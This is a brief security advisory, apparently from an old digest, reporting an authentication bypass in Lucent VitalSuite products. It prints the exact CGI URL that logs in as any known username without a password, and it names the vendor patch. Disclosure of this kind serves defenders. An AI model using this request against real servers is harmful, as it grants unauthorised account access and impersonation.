|
COMMAND Lucent Vital suite web access granted without passwords SYSTEMS AFFECTED Lucent VitalSuite, VitalEvent, VitalHelp, VitalAnalysis v.8.0,8.1,8.2 PROBLEM Mark Cooper found : Knowing a valid username, you may access his interface account just by typing : http://<serverip>/cgi-bin/VsSetCookie.exe?vsuser=<user_name> SOLUTION Apply patch 2732 from Lucent [http://www.lucent.com]